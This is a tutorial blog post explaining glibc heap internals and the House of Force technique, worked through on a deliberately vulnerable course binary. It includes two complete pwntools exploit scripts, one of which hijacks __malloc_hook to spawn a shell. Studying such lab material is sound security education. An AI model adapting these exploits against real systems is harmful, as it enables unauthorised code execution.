Heap - House Of Force

Introduction

I'm launching a series on heap exploitation techniques, starting with glibc ptmalloc Linux OS based. As we progress, I'll be sharing my discoveries and insights. It's worth noting that I won't dive into explaining the exploitation process until we've covered all the necessary heap concepts and terminologies that will be crucial throughout the exploitation journey. Our starting point is the 'House of Force' technique, which belongs to the 'House Of XXX' series. The term 'House Of XXX' encompasses a collection of exploit techniques designed for glibc vulnerabilities, originally introduced in the article 'The Malloc Maleficarum - Glibc Malloc Exploitation Techniques' in 2004.

Heap

The heap in C and C++ is where programmers reserve memory for their programs while they run. They do this by asking the heap manager to provide memory space using functions like malloc. Once they have this memory, they can use it, change it, or refer to it. When they're done, they return it to the heap manager using the free function.

In malloc.c of glibc, the description of malloc is as follows:

/* 
   malloc(size_t n)
  Returns a pointer to a newly allocated chunk of at least n bytes, or null
  if no space is available. Additionally, on failure, errno is
  set to ENOMEM on ANSI C systems.

  If n is zero, malloc returns a minumum-sized chunk. (The minimum
  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
  systems.)  On most systems, size_t is an unsigned type, so calls
  with negative arguments are interpreted as requests for huge amounts
  of space, which will often fail. The maximum supported value of n
  differs across systems, but is in all cases less than the maximum
  representable value of a size_t.
*/

As can be seen, the malloc function returns a pointer to a memory block of corresponding size bytes. In addition, this function also handles some exceptions

When n is set to 0, it will return the smallest available memory block on the system. As a point of interest, on a Linux x64 system, this smallest requested memory block is typically 24 bytes (I'll demonstrate this during debugging )
If n is a negative number, it's essential to note that size_t is an unsigned type on most systems. Consequently, the program will request a significant amount of memory, but it will likely fail because the system cannot allocate that much memory.

The system calls behind malloc and free functions are mainly (s)brk function and the mmap and munmap functions.

In other word Heap is a contiguous region of memory that is subdivided into chunks to be allocated. Each heap belongs to exactly one arena.

Arena

This is a heap area that helps each thread access different memory areas without interfering with each other.

In the case of a single-threaded process, it has one Arena, but in the case of a multi-threaded process, it has more than one Arena, so each thread existing in different Arenas can perform heap work without stopping.

Then, you may think that each thread has its own Arena, but this is a wrong idea. If each arena is assigned to each thread, resource depletion will be severe, so the number of arenas is limited depending on the 32-bit or 64-bit system and the number of cores in the system.

If a new thread is created, it finds an Arena that is not in use by other threads and connects an Arena to that thread.

If all available Arenas are being used by other threads, a new Arena is created, and when the limited number of Arenas is reached, multiple threads connect to one Arena. It will be shared on Arena.

Types of Arena

Arena is largely divided into :

Main Arena

Because it was created as the main thread, it is called Main Arena. Exists for single-threaded programs and requires heap operations such as malloc().

When a dynamic allocation request that Main Arena can handle comes in, the heap segment is expanded through sbrk() .

Sub Arena

This is called Sub Arena, and unlike the Main Arena that uses sbrk, it is allocated to new heap memory through mmap() and expanded using mprotect() .

Practice Code

(For this post, I'll cover only the first type. The second type will be discussed in a separate blog. )

main function - before calling malloc function

The Arena is the Main Arena, which is created by the main thread and exists by default without heap operations such as malloc and since Sub Arena does not exist, the next Arena points to itself.

You can see that Main Arena does not exist in the heap, but exists in the data segment of libc-2.28.so. Also, you can see that the heap area has not been allocated yet.

main function - call malloc function

Let's put a catchpoint in brk and mmap syscalls right before calling the malloc function in the main function and continue the flow of execution .

You can see that the syscall brk is used to extend the heap area:

Heap area added after malloc:

You can see that the value of the malloc_state structure in Main Arena has changed:

Chunks

A chunk of memory is a small space owned by the application. It can be released when not in use or merged with adjacent chunks to form larger memory areas. Think of a chunk as a container for the allocated memory.

In the heap, chunks come in two distinct states: 'in-use' and 'free.' It's important to note that I'll be concentrating on the 'in-use' type, as the 'House of Force' exploitation technique used on this particular state.

An 'in-use' chunk is composed of three elements:

The previous chunk size ,
The chunk size (8 bytes on 64-bit systems) + the AMP flag (3 bits),
The user data.

On 64-bit machines, user data is padded to align with 16 bytes. This alignment ensures that the last three bits of the user data size, when expressed in hexadecimal format, are always zero. This alignment provides us with an opportunity to utilize these last three bits as flags.

Now, it's time to put this into practice using GDB, and for this demonstration, I'll be working with a binary from the HeapLAB repository:

To avoid GDB from displaying the entire program information upon each run, I'll utilize set context-sections code to print just the relevant source code part. Then, I'll use the context command to view the source code as needed.

The primary function of this program is to call malloc multiple times and then return.

Using vmmap, I can visualize the current memory layout of the process. When 'malloc' hasn't been executed yet, there is no heap area in the program's memory space."

Once the first malloc is executed, checking vmmap will reveal an additional heap space with the size 21000 bytes.

Next, let's examine the distribution of chunks within the heap by using the pwndbg command vis_heap_chunk, which is abbreviated as vis

Let’s break it down: you can see the first chunk requested. As mentioned before, metadata is stored inline - The heap does not store user data alone.

Whilst programs deal with pointers to chunk user data, malloc considers chunks to start 8 bytes before their size field.

The size field value 0x0000000000000021 indicate the amount of user data it has in bytes, plus the number of bytes taken up by the size field itself. A chunk’s size field is 8 bytes long, so a chunk with 24 bytes of user data has a size field that holds the value 0x20, or 32 in decimal. The minimum usable chunk size is 0x20 (24 bytes of user data + 8 bytes of chunk’s size field) .

I know that the code calls malloc(9), requesting 9 bytes, but it actually allocates 3 * 8 = 24 bytes of space. In this case, malloc(9) reserves 24 bytes for user data and an additional 8 bytes for the chunk size, resulting in a total of 32 bytes for this chunk.

Now the big question why the size fied hold 0x21 not 0x20 ?

Chunk sizes increase in 16-byte increments. For example, the next size up from a 0x20 chunk is a 0x30 chunk, and so on as demonstrated below:

As a result, the least-significant nybble (four bits) of a size field doesn't represent the chunk size. Instead, it holds flags that signify the chunk's state. These flags are stored from the least significant to the most significant positions.

AMP flags

Example: the flag P is set when the previous chunk is still in use by the application. In this case, the prev_size field is not valid. For instance, as previously mentioned, a value like 0x21 is broken down into 0x20 for the chunk size and 0x01 for P, where 0x01 signifies that P is equal to 1.

Until now, several chunks were allocated by malloc(9), malloc(1), malloc(0), malloc(24)respectively, you can see that the contents are actually the same and occupy 0x20 bytes:

If the execution continues below, malloc(25)a 0x30 space will be allocated.

When malloc allocates 25 bytes, 8 bytes + (24 +16) bytes will be allocated. Because 25 > 24, 0x10 more space must be added.

Top chunk

The Top chunk is the final chunk within an Arena. When you allocate it using malloc, it's separated from the 'top chunk' and used. If a chunk next to the 'top chunk' is freed, it gets merged back into the 'top chunk

If a size larger than the top chunk is requested, Main Arena: Call sbrk() to expand memory to increase the size of the Top chunk.

Debugging

Right before calling malloc, as depicted below the Top chunk does not exist

Immediately after calling the first malloc()

The address of the top chunk is 0x602020 and the size value is 0x20fe0.

This means that the original size of the top chunk is 0x21000, but when a memory allocation request for 9 bytes (it will request the minimum size which is 24 bytes), it is subtracted from the top chunk, and a chunk of 0x20 is created, and the remainder 0x20fe0(0x21000 - 0x20), is left.

However, the value actually stored in the top chunk is 0x20fe1, but the last flag bit, 0x1, is set.

House Of Force

Principle

House Of Force is a heap exploitation method, but it does not mean that House Of Force must be exploited based on heap vulnerabilities. If a heap based vulnerability is to be exploited through the House Of Force method, the following conditions are required:

Able to control the size domain of the top chunk through overflow and other methods.
Able to freely control the size of the heap allocation size.

The reason House Of Force occurs is because memory allocation is handled by Top Chunk when glibc requests malloc.

If the size of the top chunk can be abused and overwritten with another value (usually -1) and a malloc request of the desired size can be made, the attacker can move the top chunk to a desired location.

Binary Walkthrough

The binary I'll work with is named house_of_force, which was provided as part of the 'Linux Heap Exploitation - Part 1' course, generously offered by the fantastic instructor Max Kamper.

Basic information

Debugging

The binary resembles the kind of pwn challenges often seen in CTFs:

To aid in understanding the vulnerability, the program leak the addresses of both puts and the heap's starting address before execution thus we don’t need to worry about bypassing mitigation techniques.

Option 1) is malloc, you can then enter the size you want to apply for and what you want to enter, for example, I applied for 1 above, but entered the string "AAAAAAAAAAAAAAAAAAAAAAAASMASHEAP" so like I've been doing for so long, let's inspect the heap chunks :

Exactly as expected, initially 24 bytes was allocated but overwriting the top chunk size field with an arbitrary value of 8 bytes.

Now, House of Force is possible because this malloc implementation doesn't check for invalid top_chunk size. I can overwrite the top chunk size to something so large that it will span the entire address space !!!

The goal of this challenge is to overwrite the value of the 'target' variable and perform code execution using the 'House of Force' (HOF) primitive .

Goal one : Overwrite the value the variable 'target'

In GDB, let's examine the address of target :

The starting address of the heap is 0x603000, but you can see that the target address is actually above the heap 0x602010:

The million-dollar question is how to overwrite the target variable?

The size of the top chunk changes continuously with the allocation and recycling of memory. If memory is allocated from the top chunk, the top chunk will decrease and the pointer of the top chunk will increase.

The code for allocating memory from the top chunk in glibc is as follows:

It checks whether the size of the top chunk can meet the allocation requirements.
It ensures that the remaining size after allocation cannot be less than the minimum chunk size (MINSIZE). If this condition is met, allocation is performed.
After allocating memory, the size field of the top chunk needs to be updated to size - nb (nb is the size of the newly allocated chunk), and the top chunk ptr is updated to ptr + nb. (ptr -> p)

// Some code  /* finally, do the allocation */
  p = av->top;
  size = chunksize (p);

  /* check that one of the above allocation paths succeeded */
  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
    {
      remainder_size = size - nb;          // Update the size of top chunk
      remainder = chunk_at_offset (p, nb); // Update the ptr of top chunk
      av->top = remainder;
      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
      set_head (remainder, remainder_size | PREV_INUSE);
      check_malloced_chunk (av, p, nb);
      return chunk2mem (p);                // Return the newly allocated memory address
    }

  /* catch all failure paths */
  __set_errno (ENOMEM);
  return 0;
}

Allocate a large memory in the top chunk to the newly applied chunk, so that an integer overflow occurs when updating the ptr of the top chunk, thereby controlling the top chunk ptr to the specified target memory address, such as the .bss segment, .data segment, and stack, etc. . When malloc is used to apply for memory again, the target memory address will be returned. After writing to the memory, data can be written to any address.

First malloc : modify the size of top chunk to a large number

From the above analysis, we can know that the following conditions need to be met to allocate memory in the top chunk.

 if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))

Since the size of the arena is 132KB, the size of the top chunk is not larger than 132KB (0x21000 bytes). Therefore, the heap allocated through the top chunk cannot exceed 0x21000 bytes under normal circumstances, which results in integer overflow occurring when the ptr of the top chunk is updated. To do this, I need to first use the heap overflow vulnerability to modify the size of the top chunk to a large number, usually -1 (its complement is 0xFFFFFFFFFFFFFFFF) using the first malloc. Then you can apply for a large memory through the top chunk to trigger an integer overflow.

Second malloc : malloc a large memory to control the top chunk ptr

Suppose the user's memory request size is request_size during this step, with the goal of controlling the final memory address target. Initially, the ptr value of the top chunk is top_old, and after allocating a new chunk, it becomes top_new.

top_new = top_old + align(request_size+ SIZE_SZ)   // SIZE_SZ is the size field length
target = top_new + 2 * SIZE_SZ   // 2* SIZE_SZ is the length of prev_size and size fields

According to the above formula, we can get :

request_size = target - top_old - 2*SIZE_SZ - SIZE_SZ

Once the second malloc is executed, the ptr of the top chunk is updated to point to the memory address of target - 2 * SIZE_SZ. Essentially, the top chunk is moved to the target memory address. To calculate request_size, you need to know the ptr of top_old in the heap memory. This information is typically obtained through other vulnerabilities that allow you to leak the address of the top chunk in the heap.

Alternatively, you can designate a specific location in the heap memory as the target. In such cases, you can determine the address of the top chunk through local debugging. In this context, the request_size calculated using the formula mentioned remains applicable. This value remains relevant even if the heap's base address changes.

Third malloc : malloc again to return to the target memory

In this scenario, the requested chunk will indeed be allocated from the target memory, ultimately returning it to the same target memory location. This allows you to write data into that memory, enabling further attacks and exploitation.

Goal one achieved

Building upon the analysis I conducted earlier, I'll utilize that understanding to create a Proof of Concept (PoC) that can effectively overwrite the target variable:

#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF("house_of_force")
libc = ELF(elf.runpath + b"/libc.so.6")

gs = '''
continue
'''
def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# Select the "malloc" option, send size & data.
def malloc(size, data):
    io.send(b"1")
    io.sendafter(b"size: ", f"{size}".encode())
    io.sendafter(b"data: ", data)
    io.recvuntil(b"> ")

io = start()

# This binary leaks the address of puts(), use it to resolve the libc load address.
io.recvuntil(b"puts() @ ")
libc.address = int(io.recvline(), 16) - libc.sym.puts

# This binary leaks the heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")
io.timeout = 0.1

# =============================================================================

# 1) First malloc : modify the size of top chunk to a large number
malloc(1, b"Y"*24 + p64(0xffffffffffffffff))

# 2) Second malloc : malloc a large memory to control the top chunk ptr 
request_size = elf.sym.target - (heap + 0x20) - 2*8 - 8  # request_size = target - top_old - 2*SIZE_SZ - SIZE_SZ
malloc(request_size, "LOL")

# 3) Third malloc : malloc again to return to the target memory
malloc(1,"THEBEST")
# =============================================================================

io.interactive()

Inspecting the heap chunks after running the python script:

Excellent! The target variable has been successfully overwritten, marking a successful exploitation using the "House of Force" technique. Next, I will delve into an example involving real code execution using malloc hooks within the "House of Force" context.

Arbitrary code execution

By manipulating the __malloc_hook address, which is invoked before malloc, and overwriting it with the address of the __ libc_system function that will allow me to get a shell :

The same process used to overwrite target will be used to overwrite the address of __malloc_hook with the address of __ libc_system using HOF primitive.

Given that the system parameter is a reference to a string, it can be readily configured as "/bin/bash" while performing the step of "allocating a large memory to take control of the top chunk pointer.

Goal two achieved

#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF("house_of_force")
libc = ELF(elf.runpath + b"/libc.so.6")

gs = '''
continue
'''
def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# Select the "malloc" option, send size & data.
def malloc(size, data):
    io.send(b"1")
    io.sendafter(b"size: ", f"{size}".encode())
    io.sendafter(b"data: ", data)
    io.recvuntil(b"> ")

io = start()

# This binary leaks the address of puts(), use it to resolve the libc load address.
io.recvuntil(b"puts() @ ")
libc.address = int(io.recvline(), 16) - libc.sym.puts

# This binary leaks the heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")
io.timeout = 0.1

# =============================================================================

# 1) First malloc : modify the size of top chunk to a large number
malloc(1, b"Y"*24 + p64(0xffffffffffffffff))

# 2) Second malloc : malloc a large memory to control the top chunk ptr also to prepare the string "/bin/sh" as an argument for system
request_size = libc.sym.__malloc_hook - (heap + 0x20) - 2*8 - 8         # request_size = target - top_old - 2*SIZE_SZ - SIZE_SZ
malloc(request_size, "/bin/sh\0")

# 3) Overwrite the adress of __malloc_hook with __libc_system
malloc(24, p64(libc.sym.system))

# 4) Trigger system function
malloc(heap + 0x30, "")
# =============================================================================

io.interactive()

And there’s the shell :

(Update 05/2019: Made a note that this method is now patched in glibc>=2.29)

Conclusion

It's true that the blog post was somewhat lengthy, but I wanted to share everything I've learned about the House Of Force primitive. While it's a fundamental technique in heap exploitation, I firmly believe that the path to mastering any skill begins with grasping the theory and foundational concepts. Slowing down and delving deeply into a topic is essential for a solid understanding. So, always start with the basics, take the time to learn, and build your expertise step by step.

Final Note: I am not a Binary Exploitation expert I'm just a learner and still discovering this wonderful field, If you think I said anything incorrect anywhere, feel free to reach out to me and correct me, I would highly appreciate that. And finally, thank you very much for taking your time to read this post.